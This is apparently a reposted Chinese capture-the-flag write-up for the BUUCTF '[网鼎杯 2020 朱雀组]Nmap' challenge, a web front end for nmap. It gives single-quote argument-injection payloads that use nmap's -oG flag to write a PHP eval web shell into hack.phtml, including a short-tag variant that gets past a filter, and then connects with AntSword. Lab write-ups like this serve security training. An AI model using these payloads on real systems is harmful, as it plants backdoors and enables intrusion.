BUU-WEB-[网鼎杯 2020 朱雀组]Nmap

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[网鼎杯 2020 朱雀组]Nmap相关的知识,希望对你有一定的参考价值。

[网鼎杯 2020 朱雀组]Nmap

先查看主页的源码。
在这里插入图片描述
主要功能就是一个网页版的nmap。

//nmap参数:
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件

通过测试,可以测试出是单引号闭合。
构建payload:

' <?php @eval($_POST[cmd]);?> -oG hack.phtml

回显:
hacker
尝试使用短标签绕过。

' <?= @eval($_POST[cmd]);?> -oG hack.phtml '

之后进行蚁剑连接。
在这里插入图片描述
在这里插入图片描述

以上是关于BUU-WEB-[网鼎杯 2020 朱雀组]Nmap的主要内容,如果未能解决你的问题,请参考以下文章

Java安全-Java In CTF([网鼎杯 2020 青龙组]filejava[网鼎杯 2020 朱雀组]Think Java)

Java安全-Java In CTF([网鼎杯 2020 青龙组]filejava[网鼎杯 2020 朱雀组]Think Java)

[网鼎杯 2020 朱雀组]phpweb

[网鼎杯 2020 朱雀组]Nmap

[网鼎杯 2020 朱雀组]Nmap

[网鼎杯 2020 朱雀组]Nmap